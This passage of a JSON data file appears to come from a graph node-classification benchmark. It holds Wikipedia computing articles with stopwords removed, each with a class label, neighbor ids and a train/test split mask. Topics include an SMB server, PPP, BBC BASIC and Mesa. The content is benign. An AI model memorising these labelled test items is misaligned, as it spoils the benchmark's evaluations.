    "text": "CIFSD:cifsd cifsd open-source in-kernel cifs/smb server created namjae jeon linux kernel initially goal provide improved file i/o performance bigger goal new features much easier develop maintain inside kernel expose layers fully directions attributed sections samba moving modules inside kernel features like remote direct memory access rdma work actual performance gain subset performance related operations belong kernelspace subset belong operations really related performance userspace dce/rpc management historically resulted number buffer overflow issues dangerous security bugs winreg user account management implemented user space cifsd file operations related performance open/read/write/close etc kernel space kcifsd also allows easier integration vfs interface file operations server daemon started starts forker thread kcifsd/0 initialization time open dedicated port 445 listening smb requests whenever new clients make request forker thread accept client connection fork new thread dedicated communication channel client server allows parallel processing smb requests commands clients well allowing new clients make new connections instance named kcifsd/1~n indicate connected clients depending smb request types new thread decide pass commands user space cifsd currently dce/rpc commands identified handled user space utilize linux kernel chosen process commands default workitems executed handlers default kworker threads allows multiplexing handlers kernel take care initiating extra worker threads load increased vice versa load decreased destroys extra worker threads connection established client dedicated kcifsd/1..n takes complete ownership receiving/parsing smb commands command received worked parallel i.e. multiple clients commands worked parallel receiving command separated kernel workitem prepared command queued handled default kworker'threads inside kernel smb workitem queued kworkers allows benefit load sharing managed optimally default kernel optimizing client performance handling client commands parallel cifsd userspace process transfer user account password registered using cifsadmin part utils user space allows sharing information parameters parsed smb.conf smb export layer kernel execution part daemon continuously running connected kernel interface using netlink socket waits requests dcerpc winreg handles rpc calls minimum dozen important file server netshareenum netservergetinfo various dfs related calls server must implement complete dce/rpc response prepared user space passed associated kernel thread client",
    "neighbors": [
      3820,
      7983,
      11221,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8425,
    "label": 8,
    "text": "Apache_CXF:apache cxf apache cxf open-source fully featured web services framework originated combination two open-source projects celtix developed iona technologies xfire developed team hosted codehaus two projects combined people working together apache software foundation new name cxf derived combining celtix xfire cxf key design considerations include cxf often used apache servicemix apache camel apache activemq service-oriented architecture soa infrastructure projects cxf includes broad feature set primarily focused following areas",
    "neighbors": [
      3462,
      8070,
      10377,
      4490,
      4107,
      6284,
      8460,
      7567,
      1296,
      1041,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      8096,
      10020,
      3877,
      10661,
      11303,
      7592,
      5677,
      1327,
      7983,
      4919,
      5047,
      2106,
      1851,
      4538,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      10949,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      6862,
      4944,
      6353,
      1363,
      6357,
      8408,
      90,
      9179,
      1756,
      7261,
      990,
      8799,
      10719,
      865,
      11105,
      11235,
      3558,
      8294,
      1128,
      11111,
      8810,
      747,
      5612,
      9834,
      4593,
      2163,
      6774,
      7159,
      10486,
      1913,
      1018,
      10877
    ],
    "mask": "Test"
  },
  {
    "node_id": 8426,
    "label": 9,
    "text": "PDF/X:pdf/x pdf/x subset pdf iso standard purpose pdf/x facilitate graphics exchange therefore series printing related requirements apply standard pdf files example pdf/x-1a fonts need embedded images need cmyk spot colors pdf/x-3 accepts calibrated rgb cielab colors retaining restrictions pdf/x-1a pdf/x files must follow certain restrictions also must contain special file identification inside pdf says pdf/x version means file conform single specific pdf/x standard even requirements met printing conditions output intent need specified file specified form standard profiles using codes like cgats tr 001 swop pdf/x file color managed data color managed graphic gets color profile even though file whole cmyk individual graphics may rgb calibration information various boxes must defined mediabox defines size entire document either artbox trimbox define extent printable area file printed bleed bleedbox must larger trimbox/artbox smaller mediabox must defined active content allowed pdf/x file means standard pdf features like forms signatures comments embedded sounds movies allowed pdf/x features forbidden pdf/x standard sometimes used affect rendering file allows things like annotations outside bleedbox pdf/x-6 development new print production standard built upon pdf 2.0 pdf/x formalized iso standards 15929 15930 versions pdf/x contain file identifications indicate version pdf/x conform appears document info dictionary document metadata according standard used 2010 complete list file identifications following strings pdf/x-1:2001 pdf/x-1a:2001 pdf/x-1a:2003 pdf/x-3:2002 pdf/x-3:2003 pdf/x-4 pdf/x-4p pdf/x-5g pdf/x-5pg observe means various revisions pdf/x-1a pdf/x-3 distinct types revisions pdf/x-4 pdf/x-5 variations",
    "neighbors": [
      10752,
      8854,
      11036,
      5149,
      2206,
      9245,
      5413,
      10413,
      11056,
      8627,
      3126,
      1079,
      5816,
      6977,
      11074,
      8904,
      1610,
      9290,
      8524,
      3921,
      2519,
      2904,
      4058,
      4064,
      8421,
      5614,
      10352,
      1010,
      3447,
      2045,
      10238
    ],
    "mask": "None"
  },
  {
    "node_id": 8427,
    "label": 0,
    "text": "Subvocal_recognition:subvocal recognition subvocal recognition svr process taking subvocalization converting detected results digital output aural text-based set electrodes attached skin throat without opening mouth uttering sound words recognized computer subvocal speech recognition deals electromyograms different speaker therefore consistency thrown positioning electrode improve accuracy researchers field relying statistical models get better pattern-matching times subject speaks electrodes even lapses carnegie mellon university researchers found speaker accuracy rates 94 one day see rate drop 48 day later two different speakers drops even relevant applications technology audible speech impossible astronauts underwater navy seals fighter pilots emergency workers charging loud harsh environments worcester polytechnic institute massachusetts research underway use subvocal information control source computer music instruments grant u.s. army research synthetic telepathy using subvocalization taking place university california irvine lead scientist mike d'zmura nasa ames research laboratory mountain view california supervision charles jorgensen conducting subvocalization research brain computer interface r program wadsworth center new york state department health confirmed existing ability decipher consonants vowels imagined speech allows brain-based communication using imagined speech us patents silent communication technologies include us patent 6587729 apparatus audibly communicating speech using radio frequency hearing effect us patent 5159703 silent subliminal presentation system us patent 6011991 communication system method including brain wave analysis and/or use brain activity us patent 3951134 apparatus method remotely monitoring altering brain waves",
    "neighbors": [
      10557
    ],
    "mask": "Test"
  },
  {
    "node_id": 8428,
    "label": 2,
    "text": "SlugOS:slugos slugos common source base group firmware distributions linksys nslu2 slugos comprises slugos/be big endian version slugos alternative firmware linksys nslu2 slugos/le little endian version slugos alternative firmware linksys nslu2",
    "neighbors": [
      2178,
      10109,
      7502,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8429,
    "label": 9,
    "text": "BBC_BASIC:bbc basic bbc basic programming language developed 1981 native programming language mos technology 6502 based acorn bbc micro home/personal computer version basic programming language adapted uk computer literacy project bbc written mainly sophie wilson bbc basic based older atom basic acorn atom extended traditional basic named codice_1/codice_2 procedures functions codice_3 loops codice_4 structures inspired comal interpreter also included powerful statements controlling bbc micro four-channel sound output low-/high-resolution eight-mode graphics display due number optimizations bbc basic ran programs much faster microsoft basic running similar machines included using multiple linked lists variable lookup rather single long list pre-defining location integer variables separate integer maths routines speed improved bbc machine via use fast ram allowed mos 6502 processor motorola 6845 display driver share memory without pausing access result design features bbc basic ran david ahl benchmark 21 seconds besting even ibm pc far outpacing 8-bit platforms one unique features bbc basic inline assembler allowing users write assembly language programs 6502 later zilog z80 ns32016 arm assembler fully integrated basic interpreter shared variables could included characters saved via *save *load called via call usr commands allowed developers write assembly language code also basic code emit assembly language making possible use code-generation techniques even write simple compilers basic 1978 hermann hauser chris curry founded acorn computers much code developed cambridge university sophie wilson colleagues complete history available basic original version shipped early bbc micros basic ii used acorn electron bbc micros shipped 1982 including model b added codice_5 codice_6 keywords along offset assembly bug fixes basic iii produced uk version united states market version acorn abortive attempt enter cross-atlantic computer market apart bug fixes change basic ii codice_7 command could also spelled codice_8 regardless input uk version always listed codice_7 us version codice_8 main place basic iii found hi-basic version external second processor basic iv also known cmos basic available bbc master machines changed use new instructions available 65sc12 processor reducing size code therefore allowing inclusion codice_11 codice_12 statement codice_13 codice_14 codice_15 codice_16 statements faster floating point bug fixes included basic iv 1986 improvement basic iv included master compact machine version basic compact included re-coded mathematical routines said provide 30 speed increase version included rest master series hi-basic available two versions first based basic iii second based basic iv built run higher address b800 second processor rather usual 8000 address bbc b allowed program space available either external internal 6502 second processors version introduced support second zilog z80 processor another version bbc basic called bas128 supplied tape disc bbc master master compact loaded main ram used 64 kb sideways ram user programs provided support much larger programs cost lot slower normal rom-based version interpreter deal basic 6502 assembly language included characters contributed system popularity industrial research engineers bbc mos risc os usually supplied rom may assumed specific release operating system contained specific version basic simple way determine version basic actually running enquiring operating system identity thus making assumption see also beebwiki entry inkey bbc family possible run standard basic enhanced hibasic 6502 second processor one may determine program running second processor examining initial value page 800 using second processor distinguish basic hibasic one examine initial value himem 8000 basic running second processor b800 hibasic second processor similar situation exists risc os may normal basic basic64 offers higher precision maths normal basic identifies basic v basic64 identifies basic vi therefore following used error occurred distinguish one better ways see beebwiki almost cases n't need testing basic platform program running make call read whatever returned data returned deal move 32-bit arm cpu removal 16 kb limit basic code size many new features added basic v version 1.04 61 kb long current versions risc os still contain bbc basic v interpreter source code risc os 5 version bbc basic v released 'shared source risc os open 2011 tba software released test versions updated basic includes support vfp/neon assembler amongst new commands features supported graphics commands entirely backwards compatible sound less example codice_28 keyword basic v onwards command takes fourteen numeric parameters effectively nothing— older versions calls os_word 8 nothing risc os in-line 6502 assembler replaced arm assembler basic v said acorn certainly fastest interpreted basic world probably powerful basic found computer basic vi version basic v supports ieee 754 8-byte format real numbers opposed standard 5-byte format introduced basic i. bbc basic v vi delivered standard acorn archimedes riscpc version bbc basic v also available run arm second processor bbc micro compiler bbc basic v produced paul fellows team leader arthur os development called archimedes basic compiler published initially dabs press abc able implement almost language obvious exception eval function inevitably required run-time programmatic interpretation evidence completeness able support in-line assembler syntax compiler written bbc basic v. compiler running interpreter early development stages able compile versions distributed self-compiled object code many applications initially written run interpreter benefitted performance boost gave putting bbc basic v par languages serious application development bbc basic also ported many platforms ns32016 version bbc basic supplied acorn 32016 coprocessor acorn abc addition version bbc basic supplied bbc micro zilog z80 second processor z80-based version bbc basic also exists cp/m-based systems recently version existed sinclair zx spectrum however due efforts j. g. harston also responsible pdp-11 version bbc basic spectrum released january 2002 many improvements made subsequent releases zilog z80 version bbc basic also used tiki 100 desktop computer cambridge z88 portable amstrad nc100 notepad amstrad nc200 notebook computers version implemented ti-83 plus ti-84 plus series graphing calculators pc-based systems bbc basic also implemented dos bbcbasic 86 aimed maximum compatibility bbc micro bbasic concentrated basic language enhancements based basic ii version bbc basic integrated microsoft windows graphical user interface bbc basic windows created richard russell developer z80 x86 versions released 2001 version still active development seeing much industry use currently whilst supporting nearly completely original bbc basic specification basic iv windows version supports much basic v/vi syntax well advanced features features unique bbc basic windows include interpreter support record/structure types ability call windows api routines external dll recent versions included advanced features comparable languages like c external library recently added support objects sdl based version bbc basic available windows linux number mobile devices supporting sdl library gpl clone bbc basic named brandy written portable c also available emulator bbc micro commodore amiga produced ariadne software cbm uk extremely fast emulate 6502 full speed assembly code would run slower real bbc basic programs would run much faster due way optimised basic 6502 emulation interacted almost commercial games would run well behaved code educational software generally worked additionally used slightly less precise floating-point numeric format bundled special academic package amiga 500 hope schools would replace ageing bbc bs amiga 500s version bbc basic v z80 also made ti-83/84+ texas instruments calculator families benjamin ryves commodore 64 version shado produced small software house aztec software early 1980s",
    "neighbors": [
      3718,
      3722,
      7691,
      1805,
      6797,
      9997,
      786,
      11412,
      22,
      3350,
      3736,
      3481,
      9881,
      9978,
      11033,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      10029,
      8494,
      303,
      7343,
      7983,
      11315,
      4409,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      6210,
      1349,
      8262,
      10750,
      712,
      847,
      1879,
      92,
      477,
      11229,
      2915,
      6499,
      5733,
      9188,
      11243,
      9964,
      2541,
      10862,
      6129,
      7281,
      5747,
      9714,
      3062,
      759,
      11384,
      6778,
      2045,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 8430,
    "label": 9,
    "text": "Homoiconicity:homoiconicity computer programming homoiconicity greek words homo- meaning icon meaning representation property programming languages language homoiconic program written manipulated data using language thus program internal representation inferred reading program example lisp program written regular lisp list manipulated lisp code homoiconic languages code accessed transformed data using representation property often summarized saying language treats code data homoiconic language primary representation programs also data structure primitive type language makes metaprogramming easier language without property reflection language examining program entities runtime depends single homogeneous structure handle several different structures would appear complex syntax noted commonly cited example programming language lisp created easy lists manipulation structure given s-expressions take form nested lists lisp programs written form lists result program access functions procedures running programmatically alter fly homoiconic languages typically include full support syntactic macros allowing programmer express transformations programs concise way examples programming languages clojure contemporary dialect lisp rebol also successor red refal recently julia original source paper macro instruction extensions compiler languages according early influential paper trac text-handling language alan kay used possibly popularized term homoiconic use term 1969 phd thesis one advantage homoiconicity extending language new concepts typically becomes simpler data representing code passed meta base layer program abstract syntax tree function may composed manipulated data structure meta layer evaluated much easier understand manipulate code since easily understood simple data since format language data format typical demonstration homoiconicity meta-circular evaluator von neumann architecture systems includes vast majority general purpose computers today implicitly described homoiconic due way raw machine code executes memory data type bytes memory however feature also abstracted programming language level languages lisp dialects scheme clojure racket employ s-expressions achieve homoiconicity languages considered homoiconic include lisp uses s-expressions external representation data code s-expressions read primitive lisp function codice_1 codice_1 returns lisp data lists symbols numbers strings primitive lisp function codice_3 uses lisp code represented lisp data computes side-effects returns result result printed primitive function codice_4 creates external s-expression lisp data lisp data list using different data types sub lists symbols strings integer numbers lisp code example uses lists symbols numbers create expression primitive lisp function codice_5 set variable codice_6 result change codice_7 term codice_8 evaluate expression print expression string read expression string line 4 create new clause operator codice_9 separates head body clause codice_10 add existing clauses add database call later languages would call creating function runtime also remove clauses database codice_11 codice_12 nowiki /nowiki number clause name number arguments take also called arity also query database get body clause codice_13 analogous lisp codice_14 function concept treating code data manipulation evaluation thereof demonstrated neatly rebol rebol unlike lisp require parentheses separate expressions following example code rebol note codice_15 represents interpreter prompt spaces elements added readability codice_16 fact built-in function rebol language construct keyword enclosing code square brackets interpreter evaluate merely treats block containing words block type block furthermore assigned value word using appears syntax assignment actually understood interpreter special type codice_17 takes form word followed colon block still interpreted using codice_18 function provided rebol similar codice_14 lisp possible interrogate elements block change values thus altering behavior code evaluated",
    "neighbors": [
      6016,
      9345,
      9224,
      1051,
      8479,
      8226,
      11555,
      6950,
      5031,
      7851,
      692,
      1591,
      10042,
      6718,
      8262,
      9926,
      10569,
      9298,
      10198,
      5081,
      11488,
      10083,
      8421,
      6502,
      9573,
      2666,
      5997,
      9454,
      3442,
      9714,
      10228,
      10739,
      502,
      2680,
      7805,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 8431,
    "label": 1,
    "text": "U-DISE:u-dise u-dise unified district information system education database schools india database developed national university educational planning administration records information level dropouts condition school toilets",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8432,
    "label": 5,
    "text": "Point-to-Point_Protocol:point-to-point protocol computer networking point-to-point protocol ppp data link layer layer 2 communications protocol used establish direct connection two nodes connects two routers directly without host networking device provide connection authentication transmission encryption compression ppp used many types physical networks including serial cable phone line trunk line cellular telephone specialized radio links fiber optic links sonet internet service providers isps used ppp customer dial-up access internet since ip packets transmitted modem line without data link protocol two derivatives ppp point-to-point protocol ethernet pppoe point-to-point protocol atm pppoa used commonly isps establish digital subscriber line dsl internet service connection customers ppp commonly used data link layer protocol connection synchronous asynchronous circuits largely superseded older serial line internet protocol slip telephone company mandated standards link access protocol balanced lapb x.25 protocol suite requirement ppp circuit provided duplex ppp designed work numerous network layer protocols including internet protocol ip trill novell internetwork packet exchange ipx nbf decnet appletalk like slip full internet connection telephone lines via modem reliable slip double checks make sure internet packets arrive intact resends damaged packets ppp designed somewhat original hdlc specifications designers ppp included many additional features seen proprietary data-link protocols time ppp specified rfc 1661 rfc 2516 describes point-to-point protocol ethernet pppoe method transmitting ppp ethernet sometimes used dsl rfc 2364 describes point-to-point protocol atm pppoa method transmitting ppp atm adaptation layer 5 aal5 also common alternative pppoe used dsl ppp layered protocol three components lcp initiates terminates connections gracefully allowing hosts negotiate connection options integral part ppp defined standard specification lcp provides automatic configuration interfaces end setting datagram size escaped characters magic numbers selecting optional authentication lcp protocol runs top ppp ppp protocol number 0xc021 therefore basic ppp connection established lcp able configure rfc 1994 describes challenge-handshake authentication protocol chap preferred establishing dial-up connections isps although deprecated password authentication protocol pap still sometimes used another option authentication ppp extensible authentication protocol eap described rfc 2284 link established additional network layer 3 configuration may take place commonly internet protocol control protocol ipcp used although internetwork packet exchange control protocol ipxcp appletalk control protocol atcp popular internet protocol version 6 control protocol ipv6cp see extended use future ipv6 replaces ipv4 dominant layer-3 protocol ppp permits multiple network layer protocols operate communication link every network layer protocol used separate network control protocol ncp provided order encapsulate negotiate options multiple network layer protocols negotiates network-layer information e.g network address compression options connection established example internet protocol ip uses ip control protocol ipcp internetwork packet exchange ipx uses novell ipx control protocol ipx/spx ncps include fields containing standardized codes indicate network layer protocol type ppp connection encapsulates following ncps may used ppp ppp detects looped links using feature involving magic numbers node sends ppp lcp messages messages may include magic number line looped node receives lcp message magic number instead getting message peer magic number previous section introduced use lcp options meet specific wan connection requirements ppp may include following lcp options ppp frames variants hdlc frames peers agree address field control field compression lcp fields omitted likewise peers agree protocol field compression 0x00 byte omitted protocol field indicates type payload packet 0xc021 lcp 0x80xy various ncps 0x0021 ip 0x0029 appletalk 0x002b ipx 0x003d multilink 0x003f netbios 0x00fd mppc mppe etc ppp limited contain general layer 3 data unlike ethertype information field contains ppp payload variable length negotiated maximum called maximum transmission unit default maximum 1500 octets might padded transmission information particular protocol padded protocol must allow information distinguished padding ppp frames encapsulated lower-layer protocol provides framing may provide functions checksum detect transmission errors ppp serial links usually encapsulated framing similar hdlc described ietf rfc 1662 flag field present ppp hdlc-like framing used address control fields always value hex ff stations hex 03 unnumbered information omitted whenever ppp lcp address-and-control-field-compression acfc negotiated frame check sequence fcs field used determining whether individual frame error contains checksum computed frame provide basic protection errors transmission crc code similar one used layer two protocol error protection schemes one used ethernet according rfc 1662 either 16 bits 2 bytes 32 bits 4 bytes size default 16 bits polynomial x x x 1 fcs calculated address control protocol information padding fields message encapsulated multilink ppp also referred mlppp mp mppp mlp multilink provides method spreading traffic across multiple distinct ppp connections defined rfc 1990 used example connect home computer internet service provider using two traditional 56k modems connect company two leased lines single ppp line frames arrive order possible frames divided among multiple ppp connections therefore multilink ppp must number fragments put right order arrive multilink ppp example link aggregation technology cisco ios release 11.1 later supports multilink ppp ppp one establish several simultaneous distinct ppp connections single link possible multilink ppp either multilink ppp uses contiguous numbers fragments packet consequence possible suspend sending sequence fragments one packet order send another packet prevents running multilink ppp multiple times links multiclass ppp kind multilink ppp class traffic uses separate sequence number space reassembly buffer multiclass ppp defined rfc 2686 pptp point-to-point tunneling protocol form ppp two hosts via gre using encryption mppe compression mppc many protocols used tunnel data ip networks like ssl ssh l2tp create virtual network interfaces give impression direct physical connections tunnel endpoints linux host example interfaces would called tun0 ppp0 two endpoints tunnel tunnel point-to-point connection ppp natural choice data link layer protocol virtual network interfaces ppp assign ip addresses virtual interfaces ip addresses used example route networks sides tunnel ipsec tunneling mode create virtual physical interfaces end tunnel since tunnel handled directly tcp/ip stack l2tp used provide interfaces technique called l2tp/ipsec case ppp provides ip addresses extremities tunnel ppp defined rfc 1661 point-to-point protocol july 1994 rfc 1547 requirements internet standard point-to-point protocol december 1993 provides historical information need ppp development series related rfcs written define variety network control protocols-including tcp/ip decnet appletalk ipx others-work ppp",
    "neighbors": [
      4609,
      10242,
      1030,
      3592,
      8211,
      6681,
      6682,
      10271,
      2080,
      6177,
      6689,
      9251,
      2085,
      2087,
      7208,
      3629,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      4158,
      5181,
      6723,
      11332,
      8265,
      4687,
      592,
      10833,
      1618,
      3167,
      1121,
      10851,
      10341,
      10344,
      5225,
      3695,
      4723,
      5749,
      2679,
      4729,
      636,
      5251,
      9860,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      5281,
      9380,
      9381,
      3751,
      3752,
      172,
      4268,
      6318,
      6319,
      7855,
      10924,
      9909,
      4793,
      7865,
      4797,
      702,
      10947,
      7364,
      8391,
      3273,
      8905,
      9930,
      11468,
      1229,
      5843,
      9939,
      10461,
      1246,
      7391,
      3297,
      2797,
      751,
      8946,
      5875,
      3322,
      6401,
      9987,
      3847,
      9992,
      9485,
      1297,
      10005,
      5402,
      5405,
      8989,
      9506,
      6436,
      8487,
      9511,
      7984,
      10035,
      7478,
      823,
      6456,
      5433,
      2362,
      8504,
      10748,
      829,
      5437,
      835,
      2373,
      2887,
      842,
      10058,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      2912,
      5472,
      10589,
      1893,
      871,
      5991,
      361,
      11112,
      367,
      8054,
      4983,
      891,
      6524,
      2431,
      11647,
      10115,
      10631,
      7049,
      6541,
      8080,
      7570,
      5531,
      5021,
      10144,
      10659,
      933,
      2983,
      5036,
      6577,
      2996,
      1977,
      10171,
      3006,
      4543,
      1478,
      9670,
      8138,
      2509,
      8654,
      2521,
      8669,
      8670,
      1506,
      10723,
      10727,
      2027,
      3564,
      5102,
      8694,
      6649,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 8433,
    "label": 2,
    "text": "Nokia_N950:nokia n950 nokia n950 developers-only phone aimed toward linux-based meego os nokia n9 developers 5,000 units produced sent developers throughout july 2011 nokia exclusively distributed device developers offered sale public phone exists several variations final device issued developers black 1 gb main memory 16 gb emmc internal storage whilst prototypes known model number n9-00 confused n9-01 silver 512 mb main memory 64 gb emmc although marked sale sold ebay €2,000 device received unofficial android port nitdroid community also port nemomobile firefox os nokia n950 phone uses hardware components nokia n9 phone following exceptions nokia n950 developers use tools nokia including qt sdk harmattan python software development",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      7220,
      821,
      11062,
      823,
      5175,
      7866,
      1728,
      7617,
      4291,
      708,
      7492,
      7877,
      199,
      967,
      10053,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1377,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      8554,
      10599,
      9964,
      109,
      5998,
      1776,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 8434,
    "label": 1,
    "text": "Oracle_SQL_Developer:oracle sql developer oracle sql developer integrated development environment ide working sql oracle databases oracle corporation provides product free uses java development kit oracle sql developer supports oracle products past variety third-party plugins supported users able deploy connect non-oracle databases oracle sql developer worked ibm db2 microsoft access microsoft sql server mysql sybase adaptive server amazon redshift teradata databases oracle sql developer supports automatic tabs code insight bracket matching syntax coloring pl/sql oracle sql developer product components include owa oracle web agent mod_plsql extension module apache web server helps setting dynamic web-pages pl/sql within oracle sql developer addition extensions provided oracle third parties written extensions add new features sql developer integrate products",
    "neighbors": [
      1539,
      1668,
      11030,
      8353,
      8994,
      8871,
      1707,
      5677,
      10413,
      9010,
      9012,
      10553,
      1594,
      9665,
      6338,
      6341,
      5960,
      597,
      9177,
      6107,
      1755,
      2269,
      865,
      1250,
      7523,
      10340,
      7022,
      1399
    ],
    "mask": "Train"
  },
  {
    "node_id": 8435,
    "label": 9,
    "text": "T_(programming_language):programming language programming language dialect language scheme developed early 1980s jonathan a. rees kent m. pitman norman i. adams yale university experiment language design implementation purpose test thesis developed guy l. steele jr. gerald jay sussman series papers scheme scheme may used basis practical programming language exceptional expressive power implementations scheme could perform better lisp systems competitively implementations programming languages c bliss usually considered inherently efficient lisp conventional machine architectures much occurs via optimizing compiler named orbit contains features modern scheme lacks example object-oriented first-class environments called locales modified non-locally used module system several extra special forms lazy evaluation flow control equivalent common lisp setf like scheme supports call-with-current-continuation call/cc also limited form called codice_1 manual hypothetical implementation codice_2 could example shows objects intimately related closures message-passing primitive called codice_3 puts two objects together allowing something resembling inheritance ported many hardware platforms operating systems including",
    "neighbors": [
      10752,
      4101,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      2620,
      3132,
      6717,
      7234,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      7269,
      8293,
      2666,
      5751,
      7805,
      7806,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      10436,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      5898,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      11604,
      1365,
      2392,
      10083,
      6502,
      11625,
      5492,
      3446,
      1399,
      10104,
      377,
      4992,
      6536,
      7562,
      6556,
      3999,
      1952,
      6047,
      4516,
      5031,
      1448,
      5033,
      9128,
      10680,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      5612,
      7670,
      11255,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8436,
    "label": 2,
    "text": "Eben_Moglen:eben moglen eben moglen professor law legal history columbia university founder director-counsel chairman software freedom law center moglen started computer programming language designer received bachelor degree swarthmore college 1980 1985 received master philosophy history jd yale university held visiting appointments harvard university tel aviv university university virginia since 1987 law clerk justice thurgood marshall 1986–87 term joined faculty columbia law school 1987 admitted new york bar 1988 received ph.d. history yale university 1993 moglen serves director public patent foundation moglen part philip zimmermann defense team zimmermann investigated export pretty good privacy public key encryption system us export laws 2003 received eff pioneer award february 2005 founded software freedom law center moglen closely involved free software foundation serving general counsel 1994-2016 board member 2000 2007 counsel moglen charged enforcing gnu general public license gpl behalf fsf later became heavily involved drafting version 3 gpl april 23 2007 announced blog post would stepping board directors free software foundation moglen stated gplv3 discussion draft 3 released wanted devote time writing teaching software freedom law center february 2011 moglen created freedom box foundation design software small server called freedombox freedombox aims affordable personal server runs free software focus anonymous secure communication freedombox launched version 0.1 2012 moglen says free software fundamental requirement democratic free society surrounded dependent upon technical devices controlling devices open via free software balance power equally moglen metaphorical corollary faraday law idea information appearance flow human minds connected via internet works like electromagnetic induction hence moglen phrase resist resistance i.e remove anything inhibits flow information moglen believes idea proprietary software ludicrous proprietary mathematics proprietary geometry would convert subjects something learn something must buy argued points software among things copied infinitely without costs moglen criticized calls reification selfishness said world full computers ca n't understand ca n't fix ca n't use controlled inaccessible proprietary software world controlled machines called lawyers help free software movement saying want share code make products share work without additional legal risks urged legal colleagues worth giving little order produce sounder ecology think kindly idea sharing moglen criticized trends result excluding people knowledge issue free software versus proprietary software argued much said stand lose moglen calls sensible respect creators users software code general concept part moglen termed revolution privileged owners media distribution channels software march 13 2009 speech given seattle university moglen said free software movement 'when everybody owns press freedom press belongs everybody seems inevitable inference ’ moving publishers get used ’ become us ’ become first amendment mean 'congress shall make law ... abridging freedom speech press ... – tended argue course 20th century – 'congress shall make law infringing sacred right sulzbergers different subject digital rights management moglen said also live world right tinker substantial threat said movie record companies must eat concede must eat though like eat less",
    "neighbors": [
      2050,
      1028,
      2180,
      4230,
      11654,
      9865,
      4493,
      1939,
      2332,
      10012,
      9343,
      3744,
      802,
      3618,
      4265,
      555,
      11180,
      6962,
      5555,
      2233,
      9148,
      10687,
      8258,
      10822,
      5703,
      1353,
      5833,
      4561,
      8147,
      1112,
      3674,
      2010,
      8283,
      7904,
      8673,
      9696,
      10464,
      3817,
      9579,
      1007,
      8304,
      1394,
      3068,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 8437,
    "label": 5,
    "text": "Simple_Gateway_Control_Protocol:simple gateway control protocol simple gateway control protocol sgcp communications protocol used within voice internet protocol voip system superseded media gateway control protocol mgcp another implementation media gateway control protocol architecture simple gateway control protocol published several internet engineering task force ietf draft versions may july 1998 mauricio arango christian huitema telcordia technologies formerly bellcore protocol architecture decomposes telecommunications gateway located boundary public switched telephone network internet protocol ip network internet media gateway controller mgc ip network providing call device control multiple media gateways mgs handle actual media conversion analog digital circuits pstn simply connect residential telephones implementations architecture refer controller softswitch communication multiple media gateway controllers handled protocols session initiation protocol sip shortly publication sgcp merged internet protocol device control ipdc proposal sponsored level3 communications fall 1998 led definition media gateway control protocol jointly submitted ietf authors sgcp ipdc october 1998 mgcp used conceptual basis additions media gateway device protocol lucent resulting megaco/h.248 protocol gained formal standards-level status ietf international telecommunication union itu",
    "neighbors": [
      5472,
      7681,
      5576,
      5843,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 8438,
    "label": 2,
    "text": "Mesa_(computer_graphics):mesa computer graphics mesa also called mesa3d mesa 3d graphics library open source software implementation opengl vulkan graphics api specifications mesa translates specifications vendor-specific graphics hardware drivers important users two graphics drivers mostly developed funded intel amd respective hardware amd promotes mesa drivers radeon radeonsi deprecated amd catalyst intel supported mesa driver proprietary graphics drivers e.g nvidia geforce driver catalyst replace mesa providing implementation graphics api open-source effort write mesa nvidia driver called nouveau mostly developed community besides 3d applications games modern display servers x.org glamor wayland weston use opengl/egl therefore graphics typically go mesa mesa hosted freedesktop.org initiated august 1993 brian paul still active project mesa subsequently widely adopted contains numerous contributions various individuals corporations worldwide including graphics hardware manufacturers khronos group administer opengl specification linux development also partially driven crowdfunding mesa known housing implementation graphic apis historically main api mesa implemented opengl along khronos group related specifications like openvg opengl es recently egl mesa implement apis indeed glide deprecated direct3d 9 since july 2013. mesa also specific unix-like operating systems windows example mesa provides opengl api directx mesa implements translation layer graphics api opengl graphics hardware drivers operating system kernel supported version different graphic apis depends driver hardware driver implementation therefore status specially true classic drivers gallium3d drivers share common code tend homogenize supported extensions versions mesa maintains support matrix status current opengl conformance visualized mesa 10 complies opengl 3.3 intel amd/ati nvidia gpu hardware mesa 11 announced drivers opengl 4.1 compliant mesa 12 contains opengl 4.2 4.3 intel vulkan 1.0 support mesa 13 brought intel support opengl 4.4 